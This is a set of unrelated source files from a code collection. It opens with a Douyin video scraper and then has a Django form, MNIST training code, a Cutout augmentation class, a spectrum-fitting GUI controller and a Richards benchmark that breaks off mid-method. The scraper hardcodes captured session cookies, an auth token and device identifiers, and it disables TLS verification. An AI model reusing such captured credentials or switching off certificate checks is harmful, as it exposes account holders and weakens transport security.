    url = "https://api3-core-c-lf.amemv.com/aweme/v1/aweme/post/?source=0&publish_video_strategy_type=0&max_cursor=1590752981000&sec_user_id=MS4wLjABAAAAcXW9VYbv07hczERdiLoQil_TRW6GbwWc_BuRU1pczaCq9GQavlvKFhl_qIqE4yZ6&count=10&ts=1594477988&cpu_support64=false&storage_type=0&host_abi=armeabi-v7a&_rticket=1594477986155&mac_address=80%3AC5%3AF2%3A70%3A8A%3A3B&mcc_mnc=46007&"
    # Request headers, copied from the same Fiddler capture.
    headers = {
        'Host': 'api3-core-c-lf.amemv.com',
        'Connection': 'keep-alive',
        'Cookie': 'install_id=2339350999993501; ttreq=1$7a4d72914f4cef66e2e2ff13b5dc74a9ab180c06; passport_csrf_token=a4f3fb89f64b4fa8c707293c951c0c17; d_ticket=19b0a970bd0b508bdde6a5128f580f540c2d6; odin_tt=c3c9b378984696b77432b71b951c0e34a773411cce385120c69196cc6529b214c7d5c8716d1fc6f4cc2cb701d61a48b4; sid_guard=fdbd63a338be8acb4a08a1621c41fea6%7C1594464835%7C5184000%7CWed%2C+09-Sep-2020+10%3A53%3A55+GMT; uid_tt=760bb76af4748dcf85a4a0c5a9c5b146; uid_tt_ss=760bb76af4748dcf85a4a0c5a9c5b146; sid_tt=fdbd63a338be8acb4a08a1621c41fea6; sessionid=fdbd63a338be8acb4a08a1621c41fea6; sessionid_ss=fdbd63a338be8acb4a08a1621c41fea6',
        'X-SS-REQ-TICKET': '1594464868804',
        'passport-sdk-version': '17',
        'X-Tt-Token': '00fdbd63a338be8acb4a08a1621c41fea6c5165e3a78a6e6e8bad4d8602a9fba4f29f111b5425b14f07ecf6df18c6b940518',
        'sdk-version': '2',
        'X-SS-DP': '1128',
        'x-tt-trace-id': '00-3d831b3e0d9bfa0994c2b4de0dc30468-3d831b3e0d9bfa09-01',
        'User-Agent': 'com.ss.android.ugc.aweme/110801 (Linux; U; Android 5.1.1; zh_CN; OPPO R11 Plus; Build/NMF26X; Cronet/TTNetVersion:71e8fd11 2020-06-10 QuicVersion:7aee791b 2020-06-05)',
        'Accept-Encoding': 'gzip, deflate',
        'X-Gorgon': '0404d8954001fffd06f451b46c120f09798b487f8c591c2f6bce',
        'X-Khronos': '1594464868',
        'x-common-params-v2': 'os_api=22&device_platform=android&device_type=OPPO%20R11%20Plus&iid=2339350999993501&version_code=110800&app_name=aweme&openudid=c5c0babc0b33a19b&device_id=2743971277974349&os_version=5.1.1&aid=1128&channel=tengxun_new&ssmix=a&manifest_version_code=110801&dpi=320&cdid=92d6111d-fa05-4987-a2bf-13b22d7caec2&version_name=11.8.0&resolution=900*1600&language=zh&device_brand=OPPO&app_type=normal&ac=wifi&update_version_code=11809900&uuid=866174600901389',
    }
    # Skip certificate verification (and silence the resulting warnings).
    requests.packages.urllib3.disable_warnings()
    html = requests.get(url, headers=headers, verify=False)
    # The payload of interest is the list of posted items.
    json_data = html.json()["aweme_list"]
    # Walk the items one by one: show the caption and playable URL, then
    # hand each URL to the download helper.
    for j in json_data:
        title = j['desc']
        print(title)
        print(j['video']['play_addr']['url_list'][0])
        download_video(j['video']['play_addr']['url_list'][0], title)
if __name__ == '__main__':
    get_video()
f21a3256b17eeb96c8b30caae7ed89f9a8f1e826 | 225 | py | Python | blog/forms.py | emreatadl/atadil-personal-blog | 88c7be19d6a27b39fd86ff3d9c34b11443291e0e | [
"MIT"
] | 1 | 2021-08-23T18:30:39.000Z | 2021-08-23T18:30:39.000Z | blog/forms.py | emreatadl/atadil-personal-blog | 88c7be19d6a27b39fd86ff3d9c34b11443291e0e | [
"MIT"
] | 1 | 2021-06-02T02:44:15.000Z | 2021-06-02T02:44:15.000Z | blog/forms.py | emreatadl/atadil-personal-blog | 88c7be19d6a27b39fd86ff3d9c34b11443291e0e | [
"MIT"
] | null | null | null | from django import forms
from .models import Comment
class CommentForm(forms.ModelForm):
    """ModelForm exposing the author, email and comment fields of Comment."""
    class Meta:
        model = Comment
        # Same field set as before, declared on one line.
        fields = ('author', 'email', 'comment')
1f385a96bb33542591c5e83aa3bccfc2d936b58f | 6,614 | py | Python | OLD_MNIST_train_test.py | sansseriff/ee148_FinalProject | 64938c7cb9bd3f9bcf295eb134dbaa209f76f88a | [
"MIT"
] | null | null | null | OLD_MNIST_train_test.py | sansseriff/ee148_FinalProject | 64938c7cb9bd3f9bcf295eb134dbaa209f76f88a | [
"MIT"
] | null | null | null | OLD_MNIST_train_test.py | sansseriff/ee148_FinalProject | 64938c7cb9bd3f9bcf295eb134dbaa209f76f88a | [
"MIT"
] | null | null | null |
def train(args, model, device, train_loader, optimizer, epoch):
    """Train ``model`` for one epoch and return the mean mini-batch loss.

    Args:
        args: namespace providing ``log_interval`` (batches between log lines).
        model: network whose forward pass returns ``(log_probs, hidden)``.
        device: torch device data and targets are moved to.
        train_loader: iterable of ``(data, target)`` mini-batches; must also
            support ``len()`` and expose ``.sampler`` (used for logging only).
        optimizer: optimizer stepping the model's parameters.
        epoch: current epoch number (used for logging only).

    Returns:
        float: training loss averaged over all mini-batches of the epoch.
    """
    model.train()  # Set the model to training mode
    total_loss = 0.0
    num_batches = 0
    for batch_idx, (data, target) in enumerate(train_loader):
        data, target = data.to(device), target.to(device)
        optimizer.zero_grad()                # Clear the gradient
        output, hidden_layer = model(data)   # Forward pass: (log_probs, hidden)
        loss = F.nll_loss(output, target)    # Negative log-likelihood loss
        loss.backward()                      # Gradient computation
        optimizer.step()                     # Perform a single optimization step
        # BUG FIX: the loss used to be accumulated only inside the logging
        # branch below (every ``log_interval``-th batch) while still being
        # divided by the batch index, so the returned "average" was wrong.
        # Accumulate every batch instead.
        total_loss += loss.item()
        num_batches += 1
        if batch_idx % args.log_interval == 0:
            print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
                epoch, batch_idx * len(data), len(train_loader.sampler),
                100. * batch_idx / len(train_loader), loss.item()))
    # Average over the actual number of mini-batches. The original divided by
    # the last zero-based index (an off-by-one that also raised
    # ZeroDivisionError with a single batch); the max() guard keeps an empty
    # loader from crashing.
    train_loss = total_loss / max(num_batches, 1)
    return train_loss
# OLD MNIST test function, kept for reference.
def test(model, device, test_loader, evaluate = False):
    """Evaluate ``model`` on ``test_loader`` and return the mean test loss.

    The model's forward pass must return ``(log_probs, hidden)``. When
    ``evaluate`` is True, additionally produce several diagnostic plots
    (nearest hidden-space neighbours, t-SNE embedding, confusion matrix,
    misclassified examples, first-layer kernels) as side effects.
    Requires plt / np / math / TSNE / sn / pd / confusion_matrix from the
    file-level imports when ``evaluate`` is True.
    """
    model.eval()    # Set the model to inference mode
    test_loss = 0
    correct = 0
    test_num = 0
    images = []             # misclassified samples as [image, pred, truth]
    allimages = []          # every sample's image (evaluate mode only)
    master_preds = []       # every predicted label (evaluate mode only)
    master_truths = []      # every ground-truth label (evaluate mode only)
    master_hidden_layers = []  # every sample's hidden-layer vector
    with torch.no_grad():   # For the inference step, gradient is not computed
        for data, target in test_loader:
            data, target = data.to(device), target.to(device)
            output, hidden_layer = model(data)
            #feature_extractor = torch.nn.Sequential(*list(model.children())[:-1])
            test_loss += F.nll_loss(output, target, reduction='sum').item()  # sum up batch loss
            pred = output.argmax(dim=1, keepdim=True)  # get the index of the max log-probability
            print(len(hidden_layer))
            print(len(hidden_layer[0]))
            #print(hidden_layer[0])
            correct += pred.eq(target.view_as(pred)).sum().item()
            test_num += len(data)
            if evaluate:
                # Collect per-sample predictions, truths, hidden vectors and
                # raw images for the diagnostics below; misclassified samples
                # are additionally recorded in ``images``.
                for i in range(len(pred)):
                    master_preds.append(pred[i][0].item())
                    master_truths.append(target[i].item())
                    layer = hidden_layer[i].cpu()
                    master_hidden_layers.append(layer.numpy())
                    image = data[i][0].cpu()
                    allimages.append(image.numpy())
                    if pred[i][0] == target[i]:
                        continue
                    else:
                        #print("not equal")
                        #print("pred is ", pred[i][0].item(), "and target is ", target[i].item())
                        image = data[i][0].cpu()
                        images.append([image.numpy(),pred[i][0].item(),target[i].item()])
    if evaluate:
        #print(len(master_hidden_layers))
        #print(master_hidden_layers[0])
        # Euclidean distance of every hidden vector to one anchor sample.
        # NOTE(review): the anchor is the hard-coded sample index 15 -- this
        # looks like a leftover from an interactive session; confirm intent.
        distances = np.zeros(len(master_hidden_layers))
        #x0 = master_hidden_layers[0]
        for i in range(len(distances)):
            length = 0
            for dim in range(len(master_hidden_layers[0])):
                length = length + (master_hidden_layers[i][dim] - master_hidden_layers[15][dim])**2
            length = math.sqrt(length)
            distances[i] = length
        sorted_distance_index = np.argsort(distances)
        # Plot the 9 samples closest to the anchor in hidden space.
        figa = plt.figure()
        print("test")
        for i in range(9):
            sub = figa.add_subplot(9, 1, i + 1)
            sub.imshow(allimages[sorted_distance_index[i]], interpolation='nearest', cmap='gray')
        # 2-D t-SNE embedding of the hidden vectors, coloured by true class
        # (fixed colour per digit 0-9).
        X = master_hidden_layers
        y = np.array(master_truths)
        tsne = TSNE(n_components=2, random_state=0)
        X_2d = np.array(tsne.fit_transform(X))
        target_ids = range(10)
        cdict = {0: 'orange', 1: 'red', 2: 'blue', 3: 'green', 4: 'salmon', 5:'c', 6: 'm', 7: 'y', 8: 'k', 9: 'lime'}
        fig, ax = plt.subplots()
        for g in np.unique(y):
            ix = np.where(y == g)
            ax.scatter(X_2d[ix, 0], X_2d[ix, 1], c=cdict[g], label=g, s=5)
        ax.legend()
        plt.show()
        #i = 1
        #plt.figure(figsize=(6, 5))
        #plt.scatter(X_2d[10*i:10*i+10,0],X_2d[:10,1])
        # Confusion matrix as a seaborn heatmap. ``CMex`` is an alias of
        # ``CM`` (the log-scaling experiment below is commented out).
        CM = confusion_matrix(master_truths,master_preds)
        CMex = CM
        #for i in range(len(CM)):
        #    for j in range(len(CM)):
        #        if CM[i][j] > 0:
        #            CMex[i][j] = log(CM[i][j])
        #        else:
        #            CMex[i][j] = CM[i][j]
        print(CM)
        print(CMex)
        df_cm = pd.DataFrame(CM, range(10), range(10))
        #plt.figure(figsize=(10,7))
        fig0,ax0 = plt.subplots(1)
        sn.set(font_scale=1)  # for label size
        sn.heatmap(df_cm, annot=True, annot_kws={"size": 11})  # font size
        #ax0.set_ylim(len(CMex) - 0.5, 0.5)
        plt.xlabel("predicted")
        plt.ylabel("ground truth")
        plt.show()
        # 3x3 grid of misclassified samples. Indexing starts at ``i + 10``,
        # so at least 19 misclassified samples must have been collected.
        fig = plt.figure()
        for i in range(9):
            sub = fig.add_subplot(3, 3, i + 1)
            sub.imshow(images[i + 10][0], interpolation='nearest', cmap='gray')
            title = "Predicted: " + str(images[i+ 10][1]) + " True: " + str(images[i+ 10][2])
            sub.set_title(title)
        # Visualize the first conv layer's kernels, min-max normalized.
        # NOTE(review): assumes ``model`` has a ``conv1`` attribute with at
        # least 8 filters -- confirm against the model definition.
        kernels = model.conv1.weight.cpu().detach().clone()
        kernels = kernels - kernels.min()
        kernels = kernels / kernels.max()
        kernels = kernels.numpy()
        print(np.shape(kernels))
        fig2 = plt.figure()
        for i in range(8):
            sub = fig2.add_subplot(2, 4, i + 1)
            sub.imshow(kernels[i][0], interpolation='nearest', cmap='gray')
            title = "Kernel #" + str(i + 1)
            sub.set_title(title)
    #fig, axs = plt.subplots(3, 3, constrained_layout=True)
    #for i in range(9):
    #    fig[i].imshow(images[i][0], interpolation='nearest', cmap='gray')
    #    axs[i].set_title("all titles")
    # Mean per-sample loss over the whole test set.
    test_loss /= test_num
    print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\n'.format(
        test_loss, correct, test_num,
        100. * correct / test_num))
    return test_loss
| 34.092784 | 121 | 0.513456 |
f271b87283aadabb9026ab47462e1036593b6b47 | 1,207 | py | Python | classification/utils/cutout.py | voldemortX/DST-CBC | e392313c129f6814c1a1c0f20c0abbd5505c3d7d | [
"BSD-3-Clause"
] | 103 | 2020-04-21T01:25:16.000Z | 2022-03-24T07:45:45.000Z | classification/utils/cutout.py | voldemortX/DST-CBC | e392313c129f6814c1a1c0f20c0abbd5505c3d7d | [
"BSD-3-Clause"
] | 13 | 2021-03-24T06:52:21.000Z | 2022-01-18T08:17:50.000Z | classification/utils/cutout.py | voldemortX/DST-CBC | e392313c129f6814c1a1c0f20c0abbd5505c3d7d | [
"BSD-3-Clause"
] | 12 | 2020-04-29T02:33:11.000Z | 2021-12-28T07:59:20.000Z | # Copied from uoguelph-mlrg/Cutout
import torch
import numpy as np
class Cutout(object):
    """Zero out one or more square patches of an image tensor.

    Args:
        n_holes (int): number of patches to cut out of each image.
        length (int): side length (in pixels) of each square patch.
    """
    def __init__(self, n_holes, length):
        self.n_holes = n_holes
        self.length = length
    def __call__(self, img):
        """Apply cutout to ``img``, a ``(C, H, W)`` tensor, and return it."""
        height, width = img.size(1), img.size(2)
        half = self.length // 2
        mask = np.ones((height, width), np.float32)
        for _ in range(self.n_holes):
            # Draw the patch centre. The RNG call order (row first, then
            # column) matches the original, so seeded runs are reproducible.
            center_y = np.random.randint(height)
            center_x = np.random.randint(width)
            # Clip the patch to the image bounds; patches near an edge are
            # truncated rather than wrapped.
            top = np.clip(center_y - half, 0, height)
            bottom = np.clip(center_y + half, 0, height)
            left = np.clip(center_x - half, 0, width)
            right = np.clip(center_x + half, 0, width)
            mask[top:bottom, left:right] = 0.
        # Broadcast the single-channel mask over all channels and apply it.
        return img * torch.from_numpy(mask).expand_as(img)
| 26.822222 | 82 | 0.528583 |
fdef9f4a13087312fde8e594440a942c62ea763c | 4,277 | py | Python | rapid/gui/controller.py | jensengrouppsu/rapid | 9f925e0561327a169a44b45df2cd6dd1af188023 | [
"MIT"
] | 1 | 2021-05-12T22:40:20.000Z | 2021-05-12T22:40:20.000Z | rapid/gui/controller.py | lassejensen-psu/rapid | 9f925e0561327a169a44b45df2cd6dd1af188023 | [
"MIT"
] | null | null | null | rapid/gui/controller.py | lassejensen-psu/rapid | 9f925e0561327a169a44b45df2cd6dd1af188023 | [
"MIT"
] | 1 | 2017-03-03T23:21:41.000Z | 2017-03-03T23:21:41.000Z | from __future__ import print_function, division, absolute_import
# Non-std. lib imports
from PySide.QtCore import Signal, QObject
from numpy import ndarray, isnan, sum
# Local imports
from rapid.common import spectrum
from rapid.gui.peak import PeakModel
from rapid.gui.exchange import ExchangeModel, NumPeaks
from rapid.gui.rate import Rate
from rapid.gui.scale import Scale
class Controller(QObject):
    '''Class to hold all information about the function'''
    def __init__(self, parent):
        '''Initialize the controller class'''
        super(Controller, self).__init__(parent)
        # Child models/widgets owned by this controller.
        self.rate = Rate(self)
        self.numpeaks = NumPeaks(self)
        self.exchange = ExchangeModel(self)
        self.peak = PeakModel(self)
        self.scale = Scale(self)
        self._makeConnections()
        # Cached parameter snapshots; all remain None until the first
        # successful call to setDataForPlot().
        self.oldParams = None
        self.newParams = None
        self.rateParams = None
        self.exchangeParams = None
        self.limits = None
        self.hasPlot = False
    def _makeConnections(self):
        '''Connect the contained widgets'''
        # When the number of peaks changes, change the matrix size
        self.numpeaks.numberOfPeaksChanged.connect(self.changeNumberOfPeaks)
        # When the number of peaks changes, also change the number of tab pages
        self.numpeaks.numberOfPeaksChanged.connect(self.peak.changePeakNum)
        # When any of the values are updated, re-plot
        self.rate.rateChanged.connect(self.setDataForPlot)
        self.exchange.matrixChanged.connect(self.setDataForPlot)
        self.peak.inputParamsChanged.connect(self.setDataForPlot)
        # Change the plot scale
        self.scale.scaleChanged.connect(self.changeScale)
    def getParametersForScript(self):
        '''Return the parameters in a format to make a script file'''
        # NOTE(review): assumes setDataForPlot() already ran at least once;
        # self.limits is None before then and indexing it would raise.
        xlim = self.limits[0], self.limits[1]
        reverse = self.limits[2]
        return xlim, reverse, self.oldParams, self.newParams
    def getParametersForInput(self):
        '''Return the parameters in a format to make an input file'''
        rate = self.rate.getParams()
        exchange = self.exchange.getParams(self.numpeaks.getNumPeaks())
        # Same precondition as getParametersForScript(): limits must be set.
        xlim = self.limits[0], self.limits[1]
        reverse = self.limits[2]
        return xlim, reverse, rate, exchange, self.oldParams
    #######
    # SLOTS
    #######
    def changeNumberOfPeaks(self):
        '''Apply a change in the number of peaks'''
        self.exchange.resizeMatrix(self.numpeaks.numPeaks)
    def setDataForPlot(self):
        '''Assembles the data for plotting, calculates the spectrum, then emits'''
        # Assemble values
        omega = self.scale.getDomain()
        npeaks = self.numpeaks.getNumPeaks()
        k = self.rate.getConvertedRate()
        Z = self.exchange.getMatrix()
        self.oldParams = self.peak.getParams()
        vib, GL, GG, h = self.oldParams
        # Don't plot if there is some error. ``sum`` here is numpy's sum (see
        # the file-level import), so isnan(sum(...)) catches any NaN entry.
        if k == 0 or k is None:
            return
        elif npeaks != len(vib) or isnan(sum(vib)):
            return
        elif npeaks != len(GL) or isnan(sum(GL)):
            return
        elif npeaks != len(GG) or isnan(sum(GG)):
            return
        elif npeaks != len(h) or isnan(sum(h)):
            return
        elif npeaks != len(Z):
            return
        elif len(omega) == 0:
            return
        else:
            self.hasPlot = True
        # Calculate spectrum
        I, self.newParams = spectrum(Z, k, vib, GL, GG, h, omega)
        # Send spectrum to plotter and new parameters to peak
        self.plotSpectrum.emit(omega, I)
        self.peak.setNewParams(*self.newParams)
        # Store data for later
        self.rateParams = self.rate.getParams()
        self.exchangeParams = self.exchange.getParams(npeaks)
        self.limits = self.scale.getScale()
    def changeScale(self, recalculate):
        '''Emit the new scale to use after re-plotting with new domain'''
        if recalculate:
            self.setDataForPlot()
        # Local names intentionally shadow the builtins min/max within this
        # method only.
        min, max, rev = self.scale.getScale()
        self.newXLimits.emit(min, max, rev)
    #########
    # SIGNALS
    #########
    # Plot the data
    plotSpectrum = Signal(ndarray, ndarray)
    # Change the scale
    newXLimits = Signal(int, int, bool)
| 33.944444 | 82 | 0.631985 |
0af9039aca18f5bd4ba800252a0ca6ad845d181b | 10,944 | py | Python | Tools/benchmarks/richards_static_basic_lib.py | mananpal1997/cinder | a8804cc6e3a5861463ff959abcd09ad60a0763e5 | [
"CNRI-Python-GPL-Compatible"
] | 1,886 | 2021-05-03T23:58:43.000Z | 2022-03-31T19:15:58.000Z | Tools/benchmarks/richards_static_basic_lib.py | mananpal1997/cinder | a8804cc6e3a5861463ff959abcd09ad60a0763e5 | [
"CNRI-Python-GPL-Compatible"
] | 70 | 2021-05-04T23:25:35.000Z | 2022-03-31T18:42:08.000Z | Tools/benchmarks/richards_static_basic_lib.py | mananpal1997/cinder | a8804cc6e3a5861463ff959abcd09ad60a0763e5 | [
"CNRI-Python-GPL-Compatible"
] | 52 | 2021-05-04T21:26:03.000Z | 2022-03-08T18:02:56.000Z | # Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
"""
based on a Java version:
Based on original version written in BCPL by Dr Martin Richards
in 1981 at Cambridge University Computer Laboratory, England
and a C++ version derived from a Smalltalk version written by
L Peter Deutsch.
Java version: Copyright (C) 1995 Sun Microsystems, Inc.
Translation from C++, Mario Wolczko
Outer loop added by Alex Jacoby
"""
from __future__ import annotations
import __static__
from __static__ import cast
import sys
from typing import Final, List
# Task IDs (indices into TaskWorkArea.taskTab)
I_IDLE: Final[int] = 1
I_WORK: Final[int] = 2
I_HANDLERA: Final[int] = 3
I_HANDLERB: Final[int] = 4
I_DEVA: Final[int] = 5
I_DEVB: Final[int] = 6
# Packet types
K_DEV: Final[int] = 1000
K_WORK: Final[int] = 1001
# Packet payload size (number of work letters carried per packet)
BUFSIZE: Final[int] = 4
# NOTE(review): BUFSIZE_RANGE is not referenced anywhere in this module's
# visible code -- confirm before removing
BUFSIZE_RANGE: List[int] = list(range(BUFSIZE))
class Packet(object):
    """A unit of work or device traffic, chained into singly linked lists."""

    def __init__(self, l: Packet | None, i: int, k: int) -> None:
        self.link: Packet | None = l   # next packet in the list (None = tail)
        self.ident: int = i            # ident of the task this packet targets
        self.kind: int = k             # packet type (K_DEV or K_WORK)
        self.datum: int = 0            # cursor / payload byte
        self.data: List[int] = [0] * BUFSIZE

    def append_to(self, lst: Packet | None) -> Packet:
        """Append this packet to the tail of *lst*; return the list head."""
        self.link = None
        if lst is None:
            # Empty list: this packet becomes the head
            return self
        tail = lst
        while tail.link is not None:
            tail = tail.link
        tail.link = self
        return lst
# Task Records
class TaskRec(object):
    '''Marker base class for the per-task private state records below.'''
    pass
class DeviceTaskRec(TaskRec):
    '''State for a device task: at most one buffered packet.'''
    def __init__(self) -> None:
        self.pending: Packet | None = None
class IdleTaskRec(TaskRec):
    '''State for the idle task: a shift-register control word and a
    countdown of remaining iterations.'''
    def __init__(self) -> None:
        self.control: int = 1
        self.count: int = 10000
class HandlerTaskRec(TaskRec):
    """State for a handler task: queues of pending work and device packets."""

    def __init__(self) -> None:
        self.work_in: Packet | None = None
        self.device_in: Packet | None = None

    def workInAdd(self, p: Packet) -> Packet | None:
        """Queue *p* at the tail of the work list; return the list head."""
        updated = p.append_to(self.work_in)
        self.work_in = updated
        return updated

    def deviceInAdd(self, p: Packet) -> Packet | None:
        """Queue *p* at the tail of the device list; return the list head."""
        updated = p.append_to(self.device_in)
        self.device_in = updated
        return updated
class WorkerTaskRec(TaskRec):
    '''State for the worker task: which handler to target next and a
    counter cycling through the alphabet.'''
    def __init__(self) -> None:
        self.destination: int = I_HANDLERA
        self.count: int = 0
# Task
class TaskState(object):
    """Tracks the three scheduling flags of a task: whether a packet is
    pending for it, whether it is waiting, and whether it is holding.
    The mutators return self so calls can be chained."""

    def __init__(self) -> None:
        self.packet_pending: bool = True
        self.task_waiting: bool = False
        self.task_holding: bool = False

    def packetPending(self) -> TaskState:
        """Runnable with a packet queued."""
        self.packet_pending = True
        self.task_waiting = self.task_holding = False
        return self

    def waiting(self) -> TaskState:
        """Waiting with no packet queued."""
        self.task_waiting = True
        self.packet_pending = self.task_holding = False
        return self

    def running(self) -> TaskState:
        """Runnable with nothing queued."""
        self.packet_pending = self.task_waiting = self.task_holding = False
        return self

    def waitingWithPacket(self) -> TaskState:
        """Waiting, but with a packet ready to be delivered."""
        self.packet_pending = self.task_waiting = True
        self.task_holding = False
        return self

    def isPacketPending(self) -> bool:
        return self.packet_pending

    def isTaskWaiting(self) -> bool:
        return self.task_waiting

    def isTaskHolding(self) -> bool:
        return self.task_holding

    def isTaskHoldingOrWaiting(self) -> bool:
        # Suspended: either explicitly holding, or waiting without input
        if self.task_holding:
            return True
        return self.task_waiting and not self.packet_pending

    def isWaitingWithPacket(self) -> bool:
        if self.task_holding:
            return False
        return self.packet_pending and self.task_waiting
# Debug tracing switch; when True, schedule() and the tasks print a trace
tracing: bool = False
# Column counter used by trace() to wrap output every 50 items
layout: int = 0
def trace(a):
    """Print *a* without a trailing newline, starting a fresh output line
    every 50 items (tracked via the module-global ``layout`` counter)."""
    global layout
    layout -= 1
    if layout <= 0:
        layout = 50
        print()
    print(a, end='')
# Capacity of the ident -> Task lookup table (idents run I_IDLE..I_DEVB)
TASKTABSIZE: Final[int] = 10
class TaskWorkArea(object):
    '''Shared scheduler state: the task table, the run list and the two
    counters that Richards.run() checks for correctness.'''
    def __init__(self) -> None:
        # Maps a task ident to its Task instance
        self.taskTab: List[Task | None] = [None] * TASKTABSIZE
        # Head of the linked list of all tasks, most recently created first
        self.taskList: Task | None = None
        # Benchmark counters: holds performed and packets queued
        self.holdCount: int = 0
        self.qpktCount: int = 0
# Single module-wide instance shared by every task
taskWorkArea: Final[TaskWorkArea] = TaskWorkArea()
class Task(TaskState):
    '''Base class for all schedulable tasks.

    Creating a Task registers it in the global taskWorkArea: in the
    ident-indexed taskTab and at the head of the taskList run list.  The
    scheduling flags are copied from initialState rather than calling
    TaskState.__init__.
    '''
    def __init__(self, i: int, p: int, w: Packet | None, initialState: TaskState, r: TaskRec) -> None:
        # Push this task onto the front of the global run list
        self.link: Task | None = taskWorkArea.taskList
        self.ident: int = i
        self.priority: int = p
        self.input: Packet | None = w
        self.packet_pending: bool = initialState.isPacketPending()
        self.task_waiting: bool = initialState.isTaskWaiting()
        self.task_holding: bool = initialState.isTaskHolding()
        self.handle: TaskRec = r
        taskWorkArea.taskList = self
        taskWorkArea.taskTab[i] = self
    def fn(self, pkt: Packet | None, r: TaskRec) -> Task | None:
        # Subclasses implement the task body; returns the next task to run
        raise NotImplementedError
    def addPacket(self, p: Packet, old: Task) -> Task:
        '''Deliver packet p to this task and return whichever of this
        task or *old* should run next (higher priority wins).'''
        if self.input is None:
            self.input = p
            self.packet_pending = True
            if self.priority > old.priority:
                return self
        else:
            # Already has input: append to the tail of the queue
            p.append_to(self.input)
        return old
    def runTask(self) -> Task | None:
        '''Dequeue one pending packet (if any) and invoke fn with it.'''
        if self.isWaitingWithPacket():
            msg = self.input
            assert msg is not None
            self.input = msg.link
            # Update the flags to reflect whether more packets remain
            if self.input is None:
                self.running()
            else:
                self.packetPending()
        else:
            msg = None
        return self.fn(msg, self.handle)
    def waitTask(self) -> Task:
        '''Mark this task as waiting; it remains the current task.'''
        self.task_waiting = True
        return self
    def hold(self) -> Task | None:
        '''Suspend this task; returns the next task on the run list
        (None when this task is the last one).'''
        taskWorkArea.holdCount += 1
        self.task_holding = True
        return self.link
    def release(self, i: int) -> Task:
        '''Release task *i* from holding; return the higher-priority of
        that task and this one as the task to run next.'''
        t = self.findtcb(i)
        t.task_holding = False
        if t.priority > self.priority:
            return t
        else:
            return self
    def qpkt(self, pkt: Packet) -> Task:
        '''Send pkt to the task it addresses, stamping it with this
        task's ident so the receiver knows where to reply.'''
        t = self.findtcb(pkt.ident)
        taskWorkArea.qpktCount += 1
        pkt.link = None
        pkt.ident = self.ident
        return t.addPacket(pkt, self)
    def findtcb(self, id: int) -> Task:
        '''Look up a task by ident in the global task table.'''
        t = taskWorkArea.taskTab[id]
        assert t is not None
        return t
# DeviceTask
class DeviceTask(Task):
    '''Simulates a device: buffers one packet, then echoes it back to the
    handler on the next activation.'''
    def __init__(self, i: int, p: int, w: Packet | None, s: TaskState, r: DeviceTaskRec) -> None:
        Task.__init__(self, i, p, w, s, r)
    def fn(self, pkt: Packet | None, r: TaskRec) -> Task:
        d: DeviceTaskRec = cast(DeviceTaskRec, r)
        if pkt is None:
            # No new packet: forward the buffered one, or wait if none
            pkt = d.pending
            if pkt is None:
                return self.waitTask()
            else:
                d.pending = None
                return self.qpkt(pkt)
        else:
            # Buffer the incoming packet and suspend until released
            d.pending = pkt
            if tracing:
                trace(pkt.datum)
            # NOTE(review): hold() returns None when this task is last on
            # the run list; the cast assumes that never happens here
            return cast(Task, self.hold())
class HandlerTask(Task):
    '''Pairs queued work packets with device packets, copying one work
    byte at a time into each outgoing device packet.'''
    def __init__(self, i: int, p: int, w: Packet | None, s: TaskState, r: HandlerTaskRec) -> None:
        Task.__init__(self, i, p, w, s, r)
    def fn(self, pkt: Packet | None, r: TaskRec) -> Task:
        h: HandlerTaskRec = cast(HandlerTaskRec, r)
        if pkt is not None:
            # File the incoming packet on the matching queue
            if pkt.kind == K_WORK:
                h.workInAdd(pkt)
            else:
                h.deviceInAdd(pkt)
        work = h.work_in
        if work is None:
            return self.waitTask()
        # work.datum is the cursor into the packet's data buffer
        count = work.datum
        if count >= BUFSIZE:
            # Work packet fully consumed: return it to its sender
            h.work_in = work.link
            return self.qpkt(work)
        dev = h.device_in
        if dev is None:
            return self.waitTask()
        # Copy the next work byte into the device packet and send it
        h.device_in = dev.link
        dev.datum = work.data[count]
        work.datum = count + 1
        return self.qpkt(dev)
# IdleTask
class IdleTask(Task):
    '''Generates load by releasing the two device tasks in a
    pseudo-random pattern until its countdown expires.'''
    def __init__(self, i: int, p: int, w: int, s: TaskState, r: IdleTaskRec) -> None:
        # NOTE(review): p and w are ignored; priority is forced to 0 and
        # the idle task never receives packets
        Task.__init__(self, i, 0, None, s, r)
    def fn(self, pkt: Packet | None, r: TaskRec) -> Task | None:
        i: IdleTaskRec = cast(IdleTaskRec, r)
        i.count -= 1
        if i.count == 0:
            # Budget exhausted: suspend the idle task for good
            return self.hold()
        elif i.control & 1 == 0:
            i.control //= 2
            return self.release(I_DEVA)
        else:
            # Shift-register style update of the control word
            i.control = i.control // 2 ^ 0xd008
            return self.release(I_DEVB)
# WorkTask
# Base character code for the work payload (letters 'A'..'Z')
A: Final[int] = 65  # ord('A')
class WorkTask(Task):
    '''Fills work packets with consecutive letters and bounces them
    alternately between the two handler tasks.'''
    def __init__(self, i: int, p: int, w: Packet | None, s: TaskState, r: WorkerTaskRec) -> None:
        Task.__init__(self, i, p, w, s, r)
    def fn(self, pkt: Packet | None, r: TaskRec) -> Task:
        w: WorkerTaskRec = cast(WorkerTaskRec, r)
        if pkt is None:
            return self.waitTask()
        # Alternate the destination handler on every packet
        if w.destination == I_HANDLERA:
            dest = I_HANDLERB
        else:
            dest = I_HANDLERA
        w.destination = dest
        pkt.ident = dest
        pkt.datum = 0
        # Fill the payload with letters, wrapping from 'Z' back to 'A'
        i = 0
        while i < BUFSIZE:
            x = w.count + 1
            w.count = x
            if w.count > 26:
                w.count = 1
            pkt.data[i] = A + w.count - 1
            i = i + 1
        return self.qpkt(pkt)
def schedule() -> None:
    '''Main scheduler loop: run tasks from the global run list until
    every task is holding or waiting (t becomes None).'''
    t: Task | None = taskWorkArea.taskList
    while t is not None:
        if tracing:
            print("tcb =", t.ident)
        if t.isTaskHoldingOrWaiting():
            # Suspended task: skip to the next one on the list
            t = t.link
        else:
            if tracing:
                trace(chr(ord("0") + t.ident))
            # Run the task; it returns the next task to consider
            t = t.runTask()
class Richards(object):
    '''Driver for the Richards OS-scheduler benchmark.'''
    def run(self, iterations: int) -> bool:
        '''Run the benchmark *iterations* times.

        Returns True when every run produced the known-good hold/qpkt
        counters, False as soon as one run disagrees.
        '''
        for i in range(iterations):
            # Reset the shared counters; the task table and run list are
            # simply overwritten by the task constructors below
